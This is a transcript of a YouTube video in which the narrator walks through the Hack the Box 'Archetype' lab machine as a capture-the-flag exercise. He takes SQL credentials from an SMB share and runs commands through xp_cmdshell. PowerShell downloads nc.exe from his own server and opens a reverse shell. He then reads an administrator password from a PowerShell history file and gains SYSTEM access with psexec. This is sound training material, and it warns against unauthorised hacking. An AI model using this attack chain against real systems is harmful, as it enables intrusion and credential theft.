What's up, guys? I hope you guys have been great. It's super hot over here, and anyway, it's been a while since I've made a lot of videos or many videos. So recently I started getting back into networking and cybersecurity. So I wanted to record my progress and my journey, I guess. I found this pretty awesome website. It's called Hack the Box, where you can sign up and log in into and connect to a lot of different machines or boxes, as they call it, and you can hack. I used to use Vulhub in the past. But the cool thing about this one is that you don't have to set up anything. You can just start with nothing set up. I am running a VM at the moment using Kali Linux, but you can use Parrot OS, Ubuntu, or any other flavor, even Windows, if you want to. The cool thing about this one is that you don't have to, like for example, in Vulnhub, you needed to download the virtual machine that you wanted to hack into and set it up on your machine or on a virtual network. This one you don't need to do that because they already have everything in here. We're going to be starting with a starting point, since these are the easiest boxes or the starting point on your journey. And there's another website that I really like. This one, they don't really tell you anything. You just do whatever you want to do and you explore, and there's nobody holding your hand. If you do want that, and I'll probably make a video about that later on at some point. There's another one that's pretty cool, and it's called tryhackme.com. And the cool thing about this one as well is that they actually, if we go in here, they give you, sometimes, not all the time, but sometimes they give you like hints and whatnot on what you need to do next. They kind of like hold your hand throughout the entire process. On some machines they don't do that, but another one, it's called PicoCTF, and this is one of the easiest. Well, it starts off was one of the easiest ones that you can do. It's mostly aimed towards high school and middle school students, which is kind of cool. I wish I had this when I was in high school and middle school, but there is something called the PicoCTF gym or something like that. I think it's practice, is it? There we go. You go into this Pico gym and you sign up. I'm not going to sign up or sign in right now, but you can do a lot of things there as well. And a lot of them are pretty easy on that one if you're like really new. Other resources that I am looking into is ine.com. And I think they recently, like if you go to plans and pricing, right now I have the free plan, which is like, they don't tell you anything about that, but you can try out the starter pass. It's totally free, and you can take a lot of the basics about networking, penetration testing, and cloud data science and other stuff, which is what I'm doing at the moment. They think they recently bought this other one called eLearn Security, which is another great tool. well, they actually have like certifications and stuff like that. So if you want to get a cert from them, you can. You can shop around here. They're kind of steep in price, some of them, but it's worth it. And here you can train, which is pretty cool. Another resource is, I haven't tried this one, but is IT Pro TV. Yeah, itpro.tv. I want to, at some point, probably going to get this one. They also have a lot of resources. I don't want to join. Come on. If you go into personal plans, they have several ones. Yeah, I'm trying to. There it is. There's the. They hit it. They hit that X. But oh, right now it's 50% off, which that's pretty cool. You can get either monthly or annual subscriptions, and you can. Oh, I guess there's a free one as well, which I'll check that out. You can also, do a lot of networking stuff, some security stuff as well. They got pen test labs, virtual labs, coaching services, which is pretty cool. And I guess you can also get your cert here. So anyway, back to Hack the Box. So if you don't have an account, go ahead and create one. And we're going to go into Labs starting point. And we are going to be attempting to do the archetype today. In order for you to connect, you have to download a file. So let's go and click on Connect to HTTP. We are going to click on Starting Point. We're going to click on Open VPN. So there's two ways that you can access this, access their stuff in here. The first one is through a VPN, Virtual Private Network, which this will allow you to have your own tools and your own Linux distribution and connect to their servers. If you don't want to do that, if you don't know how to do that, if you want me to make a video on that, let me know in the comments below and I'll go ahead and make a video on that. But if you don't, on the free version, you only get like 2 logins though. But there's this thing called a Pwnbox, which is the Linux distribution for Parent OS that they have. So you can actually use that, and you don't have to connect, it's already there, but you can use it and use it on your browser, which is it's pretty cool. You can also do that on TryHackMe, and I think on INE as well, in the learning labs they have, which is pretty cool. But I have my own box, which we're using right now, so we don't have to use Pwnbox. I'll be using OpenVPN. So let's click there. Now I'm going to be going into the US and starting point 1. I'm going to be using UDP. So just click on download VPN. And I'm totally new at this, so I'm probably going to make mistakes. If I do make any mistakes, or if you see a better way of doing this, if you're more advanced than I am, let me know in the comments below, and so everybody else can learn. Okay, so we're gonna go here, and I already made some directories called CTF, Hack the Box, YouTube, and I'm gonna move my file. Is that what it's called? To my current directory. We're just going to do that. And now I have it in here. We're also going to be making a directory for Archetype, the box that we're going to be hacking. And the reason is because we're going to be making some well, probably not this turn. I don't think this time around we're going to be making some scripts, but eventually we're going to be making Python scripts, our very own custom ones, to be able to hack websites and stuff like that, which is going to be pretty cool. So let's actually here, we just have to do sudo openvpn and the file name that you downloaded. Press enter, and you should get this initialization sequence completed. And that lets you know that you actually logged in. So now if we go back here, I think if we, it'll tell us here if we are actually connected or not. Sometimes it does, sometimes it doesn't, but whatever. The way that we can actually tell if we are connected is if we go in here and join that machine, and if we get their IP, we can ping them, and if we are getting this, we are connected. We can talk to that box. You can see right here that we have 0% packet loss, so that's pretty good. All right, so let's go to CTF, hackthebox, ctube, and Archetype. Okay, so in here, I'm going to be making one directory called nmap. We're going to be using nmap to enumerate all of the open ports that this machine has available and the services that those ports are running. Okay, and I'm also going to be making a README file so that we can annotate everything. It's a good idea when you're learning to annotate everything that you are doing, so that if you, because you will encounter whatever you're going through on this box in a different box at some point. And if you forget how to do that, and if you've already done it, and you have references, you can go back and look at that and be like, okay, so that's how I did it last time. Let's try to do it again. Okay, so we're going to do that. And what I like to do, and I learned this actually from, what's his face? His name is John Hammond. He's a very good hacker, I guess you can call him. But let's paste that in there. And what this is going to do is it's going to export. This export command is going to create a variable, a temporary variable called IP, and we're going to assign that variable to the IP address that we have here. So if we want to access it, for example, let's print it out. It gives us the IP, which is pretty cool. Now that we have that, let's run that nmap scan. We're not going to be running scripts on this one. And we're going to be saving a file inside of the nmap folder. Call it initial scan. Press enter. Put in your sudo password. And voila. Well, that's going. The cool thing about, Hack the Box and soon, I think, try Hack Me is that if you want to learn, you can actually learn for free. So we can go actually to the Academy here. I don't know if I have. No, I don't have this. Oh wait, That's because... Did it put... No? Okay. So apparently I don't have access to this one, but we could register again to be in the Academy. And what they have in there is a lot of courses that teach you about Linux, about networking, about tools that you can use, about all kinds of stuff. But let's see if this has stopped, and it has. So we see that we have several ports here. Let's copy this stuff. Oh, let's copy, and I'm just going to paste that in there. So these are the ports that we have open, and we can see that mssql has the name of that is Archetype. This is the name of the machine, I believe. We also see down here that we got SMB. So we're going to say SMB was detected, and we see that it is the Windows Server 2019. We've got the computer name, so computer name Archetype. We also see that this in the security section that the account used is guest, and the auth level is user. That means we don't need a password. I believe. I believe. Okay, so, oh, not there. So now what we want to do, because there is no web server, we can't look at a web page, so we have to be able to connect to that SMB client or whatever, like SMB server. If you don't know what an SMB server is, you can go and Google it. SMB. What is SMB? And you can see that it's a server message block, and it allows common internet file systems. You can have files, printers, serial ports between nodes on a network, and they can be accessed. Okay. So the first thing is that we need to do is we need to see the list of all the shares. To do that, we use SMB client, and we do oh, that's not what I want to do. Hold on. Let me go to remove. George and not that one. Remove that. Okay, so, oh, so I guess it didn't do anything. Maybe if we exit, come back. Nope, still there. Whatever. So we were saying we need to use SMB client. And I think the best way of learning something is actually to teach that, because it allows you to, one, really learn something to be able to explain it. And two, if you mess up, hopefully you guys are going to tell me in the comments below. and then I can learn as well. Okay, so anyway, we're going to do -L to list, and then we're just going to do the IP. And as you can see, we didn't specify a username, so it's trying to use our username. It doesn't matter, and it's asking for a password. You don't need to tell it a password because it is a guest account and it's authorized in the user level. I might be not exactly 100% right on that, but I think that's how it works. So as we can see, we have several ones. We have admin, backups, C, and IPC, and C being the default share. They're all disk types, and they have some comments. So the first one is remote admin. Then we have a default share. The one that we that says backups has nothing in there. There's like no comment. So maybe we need to look at that first. I'm pretty sure that we can't access admin. Because it's admin and we have access denied. So if we try backups, we see that we can get it. Let's type help, see what we can actually do here. So if we do ls, we can list the directory. In here, if we do cd back and try to go backwards and do ls again, we see that we can't go anywhere because the root of this SMB share is within the backups. And if we do pwd, we can print the working directory, which is where we are at the moment, and it's in the root of backups. So we see that we have that file right there. We can do all info and do prod dts config, and we can see it's a data file. The alternative name, it is prod curly1.dts. That means it's like a temporary file. Usually when it has like the little squiggly line, but I'm not really sure about this one. They just left it here for us to see. So we can see that we have this command get, and if we do get prod, and then we can specify a destination folder or name. Let's do config dts, and we just downloaded it into our local directory. Let's see what history is. Okay, so that's just the history that we have created. So you can see everything that we've typed. That's not a great thing. Okay, we can't do LA. Anyway. What is show connect? Okay, that's just that. So it doesn't seem like they can actually do anything else. So we're gonna exit. And we're gonna look into that file that we just got. So we got, oh, seems like we are not where we want to be. So let's move config dts, do ctf, hackthebox, YouTube, Archetype, and let's also move ourselves there. Oh, CTF. There we go. So now we have this. If we do file and then we type in config.dts, it's going to tell us what kind of file we have. And it is a text file. So that means that we can just print out that. We can print it out in several different ways. So we can do cat, which is concatenate, and it's going to concatenate everything that's in the file and print it out. We can also do less, and that's also going to print out the file. And we can do, I believe, strings as well. And this is going to pretty much print any strings that are within this file. So we can see that we have DT, this configuration, XML looking type, of file. So let's annotate what we just did and found in our readme.md file.
So we were able to access backups SMB share.
And how did we do that?
We did SMB client IP and then the name. We found a config file in the root of the share. We're gonna tell it that it was called prod.dts config. And
so let's explore this file. What is this? So we can see that we have a password, a user ID, and a provider. A provider is the SQL CLI. So that means that we have credentials to access the server that has the SQL right here. In order for us to actually access this, we need to use a mssql client. If you're using Kali Linux or Parrot OS, you have that installed inside of impacket mssql client. So let's press enter and see what that does. We can actually see what it needs. So if we had a domain, we would use that. Not sure what that would be, but we have a username. We have a password. This is actually optional. And this is optional. So all we need is the username and the target name or address. So if you wanted to use it, it would be something like this. SQL underscore SVC at IP. And if we wanted to, we can do the password right in there. I've never actually tried it like this, so I hope that works. And then we can do dash Windows auth, because it is a Windows machine. And we can see that we are inside. That's awesome. So let's type in help to see what we can do. So we can see that we have an XP command shell. So if we do XP command shell, let's do dir, we see that we print out where we are. And by the looks of it, looks like it's in the system 32. So we want to know exactly what we have in here, as much as we can do. And we unfortunately can't go all the way up, but looks like we have Visual Basic script installed. That's cool. We have what else? Wait for web cache, WebSocket, web services. Okay, well, cool. Nothing there. Who am I? Nothing there. Let's do PowerShell. I think we just lost connection. The second thing is that whenever people reset this, we can lose connection. So what we need to do is we need to get out of here and we need to reconnect. Okay, so there's something iffy about this again. Let's try to do that again. Let's try to enable it. So we enabled it. And we have that. Okay, so let's do PowerShell again. Okay, we see that we do have PowerShell. But unfortunately we cannot be inside of PowerShell. So what we can do, however, is use PowerShell to do a couple things. So the first thing is, let's see what processes are running. SQL Server, SQL Writer, PowerShell, we got command, DLL host, and whatnot. Okay, cool. What we can do now is we can use netcat or attempt to use netcat for Windows to be able to run a reverse shell using netcat. So what we need to do is we need to go in here. Oops, don't close that. Let's go back in there. Actually, we can just click here. And let's go and do ncat.exe, GitHub, and let's just do nc.exe. Let's go in here. Let's go in here. Let's go to download. Save that to your system. And let's partition this. And let's go into, actually we can just probably move. Okay, so we're going to move this guy and c.exe to where we are. Okay. And then we're going to be creating a server using Python 3 -m http.serve or server server listening now on port 80 or 8000. What we want to do is do wget http. We actually need our IP. So we got our IP, copy that. I'm going to paste it there. We're going to do :8000 / and then mc.exe. And then we want to output that file in a temp directory and just call it mc.exe. Press enter. And you can see right here that we actually got it. So now we want to stop doing that, clear that, and then we want to run our netcat and listen on port 1234, and then we're going to be using PowerShell. Instead of doing get, we are going to be running this guy, and we're going to do -nv, and then we're going to do our IP, and then we're going to do the port number -e to execute command exe. Okay, sweet. We can close that, and we are now talking to this. So let's there we go. So we are now in a reverse shell. So let's go to the root of the file system, do a dir, and here we go. So if we do who am I, we see that we are SQL SVC. Let's go into we can go into backups and see if there's anything in there. Anything else? Backups, directory, there's only that. So there's nothing there. So let's go into perf logs. We cannot go in there. Let's go into users and see what's there. We have an administrator. We probably administrator, we can't go in there probably. Oh, CD. And access is denied. Oops. Let's do SQL ourselves. So now we can see that we have way more stuff. But usually when we have files, we probably have them in the desktop, documents, or downloads. So, oh, look at that. We just found a user.txt file. Let's try to see what's inside of it. If we do type, and we do user.txt, and we can see that we have something. So let's go ahead and copy that. Now, we've done a lot since we entered this thing. So let's annotate what we just did.
So gained access to the mssql server with the above threads uploaded into temp file or temp folder mcwc, and ran it to execute a reverse shell.
And how did we gain access?
Well, we did unpacket msql client, and we did SQL SVC colon and the password. Let me just paste that. Let's get that password here. At IP dash Windows off. And how did we upload it? Well,
on our machine. Hold on, something is beeping over here. Let's decline that.
on our machine, we ran Python 3-m HTTP server to listen to, actually not to listen, to be able to, or to host the web server for downloading the mcexe from SQL Server. In SQL Server, we used, it was XP, CMD shell, PowerShell, wget, then HTTP colon IP 8000 mcexe, and then we outfiled temp mcexe. once we downloaded that file, we ran the file using MC. We listened on port 1234 for a connection on the SQL machine. We then ran the command msql to execute a reverse shell. So it was XP, CMD shell, PowerShell, and then it was temp msql-np, our IP, our port, -e, cmd.exe. We now have access to a remote shell.
Hopefully my connection doesn't have ouch.
Then we found our user.txt in the desktop of SQL SRC user.
And we'll see what that is in a moment. So now, now we have to do something to gain root access. We have to escalate our privileges, because if we go back here, we see that we have two things: a user own and a system own. So the first thing, this thing right here, we can actually copy that. Oh, don't go to walkthrough, just go to information. Go to submit flag right here. Go to paste and set the difficulty of the machine. Rate it. We're just going to say it was easy. For me at least, because I've already done it before. So I submit that. Flag accepted. You can see now that we have done this. We own the user. We are SQL SVC. Now we need to be admin or administrator. Now how do we do that? Well, let's figure that out. Let's run a command dir s and let's see if we can find any history files. Because if you don't know this, a lot of the things that I've been doing is because I know what to do. If you don't know, there is a file within PowerShell. It's called, what is it called? Don't forget. I mean, don't remember, but it is a history file. Here it is, console history.txt. By default, the PowerShell in Windows 10 saves the last 4096 commands that are stored in a plain text file located in the profile of its user. User profile, app data, roaming, blah, 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 blah. The history is stored separately for the PowerShell and PowerShell ISE. And as you can see, we've been to this one. And it tells us a little bit about why this file is important to us. So obviously you can see commands, right? Well, sometimes when you need to enter a password instead of PowerShell, it saves it as plain text. There is no encoding. So that's what we want to find out. So you can read this thing. I'm not going to read it for you. I've already read it. So you can go ahead and read that. on your own time. So let's do that. Let's see if there is there's obviously a history file. So we have one, we just found one. And it is in here. So let's cd into that. Copy cd into right there. We're gonna dir, and we're gonna type console host underscore history.txt. We're gonna see what's inside of this file. And what do you see? It says we used net exe to use to log in pretty much the backups as an administrator. And there's the password. And then they exited. That's all they did. So let's copy that. We now have another user. Copy. Paste. So let's do this.
We checked the PowerShell console host history.txt file, and we found that the previous user had logged in to backups using the admin user with a password. And there you go.
So we found the username and password for the administrator. So now, I think now we can just, let me see. No, there's no SSH port here. So we can't do anything anymore here. Let's exit that. Exit that. We need to now go into the system, obviously, as an administrator. To do that, we need to use another impacket script, and this one is going to be ps exec. And let's see what this does. PS exec functionality using remcom svc. The arguments are similar to what we did before, which is the username, password, and the target. There is, and that's it, I guess. Okay, so we do the same thing. The username is administrator. Administrator at, actually colon. Let's grab this password real quick. Paste at IP. Enter. What happened? Let's just do that, I guess. Didn't like the admin stuff. Paste. And we have access. Who am I? Oh. What? Oh, who am I? There we go. We are the NT authority user or system. Take a look at the administrator. So we're gonna go into, oh, let's see what perf logs was. Oops, forget about that. Perf logs. There's nothing in it, right? Okay, let's go into users, cd users, there you go, directory, cd administrator, and we are going to go back into the desktop, and we found something. We found a root text file. So let's read that. And we have another flag for us to use. Right, so let's now annotate what we have done.
Let's see, using inpacket-ts exec, we were able to log into the system as an administrator. We then navigated to the admin's home directory and to its desktop folder and found a root.txt file with our flag.
Boom. So now we can copy this and we can go back in here, go to submit flag, paste that flag, say that was easy, submit that flag, flag accepted, and we have now the system. And that's the end of this archetype box. Well, I hope you guys learned a lot in this video. I hope you guys liked this video. I'm going to be making more of this video because I'm learning this now. And so yes, I know that originally my channel was just for programming and for video games, but one thing that you have to learn is that if you're going to be a programmer, this is something that we all should be learning, because if you haven't noticed, EA just got hacked and their source code and everything else that they have is now being sold on the black market for a lot of money. If you don't want that to happen to you or to the company that you're working for, it is crucial that we learn how to hack, how things work exactly, so that we can prevent this from happening again or make it harder. Nothing is going to be 100% unhackable. Everything is going to always probably have vulnerabilities, but once we know how things work, we can figure it out. We can see how to make things more secure, because that's not something that they teach you when you go to college and you go to a science degree to get a science degree, computer science degree on C++ or whatever else, or game programming. They never said that, at least not when I went, because they don't know. Most people don't know that. Unless you're going to be doing this, unless you're going to be in the cybersecurity, most people don't know this. And I think we should all learn how to do this. Now, with that said, don't go and be hacking people without their permission. That's illegal. If you're going to be doing this, do this legally within hackthebox, picoctf, tryhackme.com, and other websites like these. Let me know in the comments what you thought about this video and what you learned. I would like to hear about you. If you like this video, hit that like button. If you want to subscribe to my channel and see more videos like this and learn how to make games, subscribe to my channel. If you think this will help somebody else, share it. We're all here to learn. Thank you guys for tuning in, and I'll see you next time. Stay tuned. Stay safe.